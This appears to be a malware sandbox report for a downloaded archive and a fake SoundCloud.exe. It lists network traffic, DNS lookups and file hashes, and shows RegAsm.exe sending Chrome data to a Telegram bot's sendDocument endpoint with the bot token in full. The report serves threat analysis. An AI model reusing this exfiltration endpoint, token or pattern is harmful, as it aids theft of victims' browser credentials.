                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e8f9a67
                                            Host: api.telegram.org
                                            Content-Length: 429057
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2
                                            tls, http
                                            chrome.exe
                                            5.7kB
                                            157.5kB
                                            69
                                            122

                                            HTTP Request

                                            GET https://workupload.com/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/js/39b9ad5.js?v=KUUBLAOP

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/puzzle
                                            tls, http
                                            chrome.exe
                                            3.8kB
                                            46.4kB
                                            29
                                            41

                                            HTTP Request

                                            GET https://workupload.com/css/4280ebd.css?v=KUUBLAOP

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/bundles/app/img/workupload_logo_medium.svg

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/puzzle

                                            HTTP Response

                                            200
                                          • 172.217.20.162:443
                                            googleads.g.doubleclick.net
                                            tls, http2
                                            chrome.exe
                                            999 B
                                            6.0kB
                                            9
                                            8
                                          • 142.250.179.78:443
                                            fundingchoicesmessages.google.com
                                            tls, http2
                                            chrome.exe
                                            1.0kB
                                            8.4kB
                                            10
                                            10
                                          • 49.13.126.162:443
                                            https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720
                                            tls, http
                                            chrome.exe
                                            4.1kB
                                            26.6kB
                                            23
                                            30

                                            HTTP Request

                                            GET https://t.workupload.com/matomo.js

                                            HTTP Response

                                            200

                                            HTTP Request

                                            POST https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720

                                            HTTP Response

                                            204
                                          • 144.76.176.119:443
                                            https://workupload.com/translations.js?en
                                            tls, http
                                            chrome.exe
                                            5.5kB
                                            25.9kB
                                            21
                                            28

                                            HTTP Request

                                            POST https://workupload.com/captcha

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/translations.js?en

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            tls, http
                                            chrome.exe
                                            11.4kB
                                            245.5kB
                                            102
                                            189

                                            HTTP Request

                                            GET https://workupload.com/favicon.ico

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/js/39b9ad5.js?v=KUUBLA72

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/css/4280ebd.css?v=KUUBLA72

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/bundles/app/img/workupload_logo_small.svg

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0
                                            tls, http
                                            chrome.exe
                                            5.0kB
                                            83.0kB
                                            41
                                            69

                                            HTTP Request

                                            GET https://workupload.com/qr/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            tls, http
                                            chrome.exe
                                            3.3kB
                                            53.0kB
                                            29
                                            45

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/favicon/favicon.ico
                                            tls, http
                                            chrome.exe
                                            4.8kB
                                            68.9kB
                                            36
                                            58

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/favicon/favicon.ico

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            3.9kB
                                            6.1kB
                                            13
                                            13

                                            HTTP Request

                                            GET https://workupload.com/start/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/qr/file/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/favicon/manifest.json
                                            tls, http
                                            chrome.exe
                                            1.7kB
                                            4.8kB
                                            12
                                            12

                                            HTTP Request

                                            GET https://workupload.com/favicon/manifest.json

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            3.8kB
                                            1.4kB
                                            12
                                            10

                                            HTTP Request

                                            GET https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 94.130.130.53:443
                                            https://f81.workupload.com/download/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            4.8kB
                                            148.2kB
                                            63
                                            115

                                            HTTP Request

                                            GET https://f81.workupload.com/download/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 94.130.130.53:443
                                            f81.workupload.com
                                            tls
                                            chrome.exe
                                            913 B
                                            4.2kB
                                            7
                                            10
                                          • 172.217.20.196:443
                                            www.google.com
                                            tls
                                            chrome.exe
                                            953 B
                                            4.8kB
                                            8
                                            9
                                          • 142.250.179.78:443
                                            https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                            tls, http2
                                            chrome.exe
                                            2.3kB
                                            10.5kB
                                            15
                                            17

                                            HTTP Request

                                            POST https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                          • 216.58.215.42:443
                                            https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                            tls, http2
                                            chrome.exe
                                            1.8kB
                                            6.9kB
                                            15
                                            15

                                            HTTP Request

                                            GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                          • 49.12.202.237:443
                                            https://www.7-zip.org/7ziplogo.png
                                            tls, http
                                            chrome.exe
                                            1.7kB
                                            5.6kB
                                            12
                                            14

                                            HTTP Request

                                            GET https://www.7-zip.org/7ziplogo.png

                                            HTTP Response

                                            200
                                          • 49.12.202.237:443
                                            https://www.7-zip.org/a/7z2405-x64.exe
                                            tls, http
                                            chrome.exe
                                            46.1kB
                                            1.7MB
                                            869
                                            1217

                                            HTTP Request

                                            GET https://www.7-zip.org/

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/style.css

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/favicon.ico

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/a/7z2405-x64.exe

                                            HTTP Response

                                            200
                                          • 172.217.20.174:443
                                            play.google.com
                                            tls, http2
                                            chrome.exe
                                            1.0kB
                                            7.9kB
                                            10
                                            11
                                          • 52.111.236.22:443
                                            322 B
                                            7
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            554.9kB
                                            12.0kB
                                            444
                                            103

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            534.5kB
                                            16.0kB
                                            400
                                            187

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            488.5kB
                                            11.5kB
                                            393
                                            99

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 8.8.8.8:53
                                            workupload.com
                                            dns
                                            chrome.exe
                                            520 B
                                            792 B
                                            8
                                            8

                                            DNS Request

                                            workupload.com

                                            DNS Response

                                            144.76.176.119

                                            DNS Request

                                            googleads.g.doubleclick.net

                                            DNS Response

                                            172.217.20.162

                                            DNS Request

                                            t.workupload.com

                                            DNS Response

                                            49.13.126.162

                                            DNS Request

                                            162.20.217.172.in-addr.arpa

                                            DNS Request

                                            fonts.gstatic.com

                                            DNS Response

                                            216.58.214.67

                                            DNS Request

                                            apis.google.com

                                            DNS Response

                                            142.250.178.142

                                            DNS Request

                                            237.202.12.49.in-addr.arpa

                                            DNS Request

                                            ip-api.com

                                            DNS Response

                                            208.95.112.1

                                          • 8.8.8.8:53
                                            162.201.250.142.in-addr.arpa
                                            dns
                                            350 B
                                            565 B
                                            5
                                            5

                                            DNS Request

                                            162.201.250.142.in-addr.arpa

                                            DNS Request

                                            www.google.com

                                            DNS Response

                                            172.217.20.196

                                            DNS Request

                                            163.214.58.216.in-addr.arpa

                                            DNS Request

                                            42.215.58.216.in-addr.arpa

                                            DNS Request

                                            1.112.95.208.in-addr.arpa

                                          • 8.8.8.8:53
                                            78.179.250.142.in-addr.arpa
                                            dns
                                            352 B
                                            589 B
                                            5
                                            5

                                            DNS Request

                                            78.179.250.142.in-addr.arpa

                                            DNS Request

                                            53.130.130.94.in-addr.arpa

                                            DNS Request

                                            www.gstatic.com

                                            DNS Response

                                            216.58.214.163

                                            DNS Request

                                            142.178.250.142.in-addr.arpa

                                            DNS Request

                                            29.243.111.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            162.126.13.49.in-addr.arpa
                                            dns
                                            370 B
                                            833 B
                                            5
                                            5

                                            DNS Request

                                            162.126.13.49.in-addr.arpa

                                            DNS Request

                                            67.214.58.216.in-addr.arpa

                                            DNS Request

                                            content-autofill.googleapis.com

                                            DNS Response

                                            216.58.215.42
                                            142.250.179.74
                                            142.250.179.106
                                            142.250.178.138
                                            142.250.201.170
                                            142.250.75.234
                                            216.58.214.170
                                            172.217.20.170
                                            172.217.20.202

                                            DNS Request

                                            174.20.217.172.in-addr.arpa

                                            DNS Request

                                            nexusrules.officeapps.live.com

                                            DNS Response

                                            52.111.243.29

                                          • 224.0.0.251:5353
                                            chrome.exe
                                            204 B
                                            3
                                          • 172.217.20.196:443
                                            www.google.com
                                            https
                                            chrome.exe
                                            37.5kB
                                            1.2MB
                                            256
                                            1044
                                          • 142.250.178.142:443
                                            apis.google.com
                                            https
                                            chrome.exe
                                            4.8kB
                                            50.9kB
                                            26
                                            43
                                          • 172.217.20.174:443
                                            play.google.com
                                            https
                                            chrome.exe
                                            6.5kB
                                            9.8kB
                                            16
                                            15

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\7-Zip\7-zip.dll

                                            Filesize

                                            99KB

                                            MD5

                                            3428b9967f63c00213d6dbdb27973996

                                            SHA1

                                            1cf56abc2e0b71f5a927ea230c8cca073d20fc97

                                            SHA256

                                            56008756553ea5876fb8aad98f6f5dbca1ba14c5e53f4fa9ec318e355e146a7e

                                            SHA512

                                            b876b39d030818ce7879eb9bb5ff4375712cf145b7457a815880bf010215bd9dcde539e7d0877c56558e0d23a310bc75bfb9d315f9966cbda4ae02a7821980cc

                                          • C:\Program Files\7-Zip\7z.dll

                                            Filesize

                                            1.8MB

                                            MD5

                                            2537a4ba91cb5ad22293b506ad873500

                                            SHA1

                                            ce3f4a90278206b33f037eaf664a5fbc39089ec4

                                            SHA256

                                            5529fdc4e6385ad95106a4e6da1d2792046a71c9d7452ee6cbc8012b4eb8f3f4

                                            SHA512

                                            7c02445d8a9c239d31f1c14933d75b3e731ed4c5f21a0ecf32d1395be0302e50aab5eb2df3057f3e9668f4b8ec0ccbed533cd54bc36ee1ada4cc5098cc0cfb14

                                          • C:\Program Files\7-Zip\7zFM.exe

                                            Filesize

                                            960KB

                                            MD5

                                            b161d842906239bf2f32ad158bea57f1

                                            SHA1

                                            4a125d6cbeae9658e862c637aba8f8b9f3bf5cf7

                                            SHA256

                                            3345c48505e0906f1352499ba7cbd439ac0c509a33f04c7d678e2c960c8b9f03

                                            SHA512

                                            0d14c75c8e80af8246ddf122052190f5ffb1f81ffd5b752990747b7efcb566b49842219d9b26df9dbe267c9a3876d7b60158c9f08d295d0926b60dbbebc1fa3c

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            456B

                                            MD5

                                            bd670cfd10a6dbc238cb883febfeb8ba

                                            SHA1

                                            d2af02ddb7fd099f5638e5194a91dd05edd79b32

                                            SHA256

                                            fe94e2ae029158ef8d62f875fe1902153e004cdf6da408ffb10bd51776012916

                                            SHA512

                                            67a4965b27233a08f04a2c89e666532a8a96d5dd3672879d1d35081f8b007dee0174496e0198a4316191b3e1c7c180753d7f98f53031eb2baf635e18e1303db4

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                            Filesize

                                            20KB

                                            MD5

                                            8206e525da6316e6a1b062a750955bab

                                            SHA1

                                            aa0b681f21b3bed10ac3bcee956d6c80da7abbc9

                                            SHA256

                                            bc16018c584db9deb8e996f386790894223078b92fdd91149e3c8715ca894d43

                                            SHA512

                                            40f0b11d4fa41a4d23ffffb05cef82d6276f3a81a70186ca435b4e162fe19105a6a82e24cc3af5dc098eb1ed7dca5bf6dfd8b9bf387d1ae15a95a3741e0d2e70

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                            Filesize

                                            2KB

                                            MD5

                                            1ae9cbc493eadaa8a8377d7a2ee67fcf

                                            SHA1

                                            79577ecfef510b247aa68edb48f2af3d0a8c1085

                                            SHA256

                                            7b7d77cb2086985447357fbd4e7bdcc94e90df73e0e197df02257ac103af8f27

                                            SHA512

                                            3f6a2b35c482e5ba45da9dd05b04feeadaf26fa75b205a44542f863c292aad38463a355fb0e95c75c462c65202e339187a222f931b704a9254274c2487fec424

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                            Filesize

                                            2B

                                            MD5

                                            d751713988987e9331980363e24189ce

                                            SHA1

                                            97d170e1550eee4afc0af065b78cda302a97674c

                                            SHA256

                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                            SHA512

                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            356B

                                            MD5

                                            16ef4370e535446ac1f72367179bbb45

                                            SHA1

                                            f6a1f7b3454a92f0550eac251642f555e9e239ca

                                            SHA256

                                            e87a187c5444cf1b8750dd088419bc3720c05dccf6ef87144324a5e8eb4ff5b4

                                            SHA512

                                            cc540f1a164239bde2c806f3fde34667c93ee1be529ef1318a5cb61a18da7bcfbde74595171492645d5f2383df4b2748721060db9f6b47b5a04a405ff6af7d64

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            7KB

                                            MD5

                                            9a2a057dc2341e08eb4d29e97dc6cc5c

                                            SHA1

                                            e169fa36bd0e6e3120056fe575fe664868ccd7f5

                                            SHA256

                                            1451714f4de8bf1467f86f35808ccd8375f1c7aa90d031a0204b2fa11eefac51

                                            SHA512

                                            5832d5bff01879b1b2c1009623261ef2f7864f7963f1b7e2fe27eb4a8c25020fdd0d7deafe47dca2c704e22db34e32ed1997aed8ceb5b28d2b0ae6161ba19076

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                            MD5

                                            f097262867849492a1165aeba6524d28

                                            SHA1

                                            1927acebdb41c523fb0c1351110b6aa6e24df457

                                            SHA256

                                            12adf42011a0814f0c3b001314bbe0596533ccd701a1fb7bc7164e235e0269aa

                                            SHA512

                                            a424be38654a3b8dbbd282b9e5f7b2fa205d9c19f712ff675e453ba63c24b86e2538e41db58ca300f3217ff146b51091b4aeb699203d93f3a7d4a70297087ec4

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                            MD5

                                            4bc16c809a283654150d4f3c06ba59eb

                                            SHA1

                                            42de2a9a60110a2791921b2cc0c68a909b234827

                                            SHA256

                                            e7429092339f6969431e072b087b05f908c0e1d9fcd02d0827aeead5607ef441

                                            SHA512

                                            65b6dd87c223b62586ae7a616e39bebd89870290f4939afb37da4033b060a572f5b2e1cc9c9391e6a6c3e72a5ff58dcb10882ac64247223cb7b39ca4e7769b0c

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                            Filesize

                                            100KB

                                            MD5

                                            4c426446c3a66eda1ad3b2fe071deb51

                                            SHA1

                                            f8a7657fdb1e41a1d8799bec5213e92559011511

                                            SHA256

                                            21c1ac0326bb59769908fdbb87394b2adc6387f9a007a6c84edb7cd9ef10b3a0

                                            SHA512

                                            14f19021d4de4179723bd20ea7b5a909eb7dbff58e840e4df57cec26b83a71a2f1c750afe533747cb2f5f21a0a7993c1eda8050206f11cec3a53a0aaddf8448b

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

                                            Filesize

                                            14B

                                            MD5

                                            009b9a2ee7afbf6dd0b9617fc8f8ecba

                                            SHA1

                                            c97ed0652e731fc412e3b7bdfca2994b7cc206a7

                                            SHA256

                                            de607a2c68f52e15a104ead9ecbaa3e6862fdb11eac080e408ba4d69f1f7a915

                                            SHA512

                                            6161dd952ae140a8fb8aa5e33f06bc65fdc15ce3fbfe4c576dc2668c86bce4a1d5c1112caee014e5efa3698547faad3bc80ec253eedb43148e36e1a02ce89910

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                            MD5

                                            a2bc01d50ed23bc467cbf353ba83bca0

                                            SHA1

                                            b303509dc14b5b8e41c1df8924346462436fa255

                                            SHA256

                                            ccc92bcd149245a5da5d32ab48a2254186190629c741717c37ff8849e27f4677

                                            SHA512

                                            69888d4e3faa0da736ae090ad34fa6ae3c2df79592d12af3b1de72725c746f681bba92ca19b8032caa6c19ed948397603793af3b60e96526f40c4ee1ba98c4bf

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                            MD5

                                            ea0e94b91ee53431f3373416e8c792f3

                                            SHA1

                                            f7c538be58729ab0f0ae00c50f14205889b8659e

                                            SHA256

                                            9cc9cea4dc8c371195276b8d673a1c3ffee24bb1b02d9df58e9028efa6d0193f

                                            SHA512

                                            104330af10b1c0ba2051a696b44f64490c3e918b02e830192fac19758c9bb2370d7601aa3072a36983cca319287797dae588e9efff77eca7d8f8d55e10dc030b

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            151KB

                                            MD5

                                            76471072db11737e4f039166e93112b0

                                            SHA1

                                            50f0753f9b25944e2cafd25a67da04a099fe659c

                                            SHA256

                                            d23507a77a753903d4a5449dec74ec332d01a3966d2b9ef875d58bc3150733b8

                                            SHA512

                                            fa64f99724bb1cd5bb045966f22ee433ceafd293f7c4ac42e185d6efd95a842de340159ea3c251e4dd53e6b9716e6c9ba10dfc6b836e5db4b03c4337a234fbf2

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                            MD5

                                            81120629ae626ab84558383dc56a39e3

                                            SHA1

                                            7d307687158c5c2461a34fac88d796fc8649226e

                                            SHA256

                                            8bd7fb54ec519e2e05f69109b4e4e0e8f866ae473d0cec7d96089484d03e2591

                                            SHA512

                                            512b77ce94a4260bc901c7412db8f17cae7b51cda331edec70a77a5d70f3ad2683fd679945c70105079a91296ae82f230835df7608bb106ac0968b1fadf18651

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            88KB

                                            MD5

                                            79cfa7b4bb7638364e735c1ece247192

                                            SHA1

                                            5f4ea71792479b491e760b8de0d9756cf4582f86

                                            SHA256

                                            3a1b1c3cce84b08d54866c0e66eb8f48fb6f91bb811d59fcba28ffe77a1446ac

                                            SHA512

                                            979b93a175783f6986ac24633aec94e2eb0a13fb86b065b52647b660d5fa1b84bf40978e840e805964b54a4081794349daf7c5400a2f94150c1146de7198a99a

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            102KB

                                            MD5

                                            5cb911406ab0a14d34985425b7b1a0f9

                                            SHA1

                                            4037c0521592689ab899d52055d38ba881aa0c4c

                                            SHA256

                                            ffb89e1588f1798de4c8b3efb0d82c1d1256cc5f03df498bee144552ad6f9676

                                            SHA512

                                            d994ca4097ed747d1a8ba4e4dd28f3e04646a19fa8efa1727a08eab71b894213474d8d96382705c46a9914431e937793722ad73efef8c6856bf969ac9e2e8335

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                            Filesize

                                            1KB

                                            MD5

                                            8027da56b81b4be78ce34b4d9ed80767

                                            SHA1

                                            a3c2dc4608cac62684c7b7c64228bf75088ab734

                                            SHA256

                                            a9ae05be33bf31233ae315a7d97c24162b6c514b3634bee5d00b0a926e40f2e9

                                            SHA512

                                            486a7e1bd541e7a85ad9565910c03bb14a59052a9ade23afc03af11d9edb92c9339a2b78b066ba7fb1902da4f3be3bdbace799ca12e2c002b16ab2b30fdee840

                                          • C:\Users\Admin\Desktop\SoundCloud.exe

                                            Filesize

                                            182KB

                                            MD5

                                            75c4a5f827b71f386c836a00155b349c

                                            SHA1

                                            20a2552cd785f96049d4b524dd35c9897c3d9b1d

                                            SHA256

                                            964883bdeb50388f7fe56cdadb3b81009ea8c0ad78bb2f832b267b163981acf9

                                            SHA512

                                            add872232df95c4191be4c89b7ea25b64e395521c4d627759905bc34378353f0dffff2440156d58989e53bc0c331e97edb1415ddaba37c1cda92c82b61dd7584

                                          • C:\Users\Admin\Downloads\7z2405-x64.exe

                                            Filesize

                                            1.5MB

                                            MD5

                                            c73433dd532d445d099385865f62148b

                                            SHA1

                                            4723c45f297cc8075eac69d2ef94e7e131d3a734

                                            SHA256

                                            12ef1c8127ec3465520e4cfd23605b708d81a5a2cf37ba124f018e5c094de0d9

                                            SHA512

                                            1211c8b67652664d6f66e248856b95ca557d4fdb4ea90d30df68208055d4c94fea0d158e7e6a965eae5915312dee33f62db882bb173faec5332a17bd2fb59447

                                          • C:\Users\Admin\Downloads\7z2405-x64.exe:Zone.Identifier

                                            Filesize

                                            26B

                                            MD5

                                            fbccf14d504b7b2dbcb5a5bda75bd93b

                                            SHA1

                                            d59fc84cdd5217c6cf74785703655f78da6b582b

                                            SHA256

                                            eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                            SHA512

                                            aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                          • C:\Users\Admin\Downloads\alright prynce v2 fr.rar

                                            Filesize

                                            135KB

                                            MD5

                                            6522c1ece1df708e08d37f9f354ce29d

                                            SHA1

                                            5174670de1c95518ac9575d1717da2965542d89e

                                            SHA256

                                            c63e9763cdc05db1a65d6bd24c540fffdbbdf658e82245ef0acbeabe0918b6c8

                                            SHA512

                                            4f607c2f1e9ab172abe6929385582f27ee3e1ada57e15eabcdfeb4e2b2898c7e06962a2dcf1500263e38466affe153d4ffea03e01bf075297589a5c7ead066b4

                                          • C:\Users\Admin\Downloads\alright prynce v2 fr.rar:Zone.Identifier

                                            Filesize

                                            120B

                                            MD5

                                            f2d2e150f40b59967a7360c3190a4ce8

                                            SHA1

                                            144f890a4742ddd050ecc9b997b36142d4d66c22

                                            SHA256

                                            90929a8ed184308648f2c664017d7136eae910d8c046384c92bf32dd690b55eb

                                            SHA512

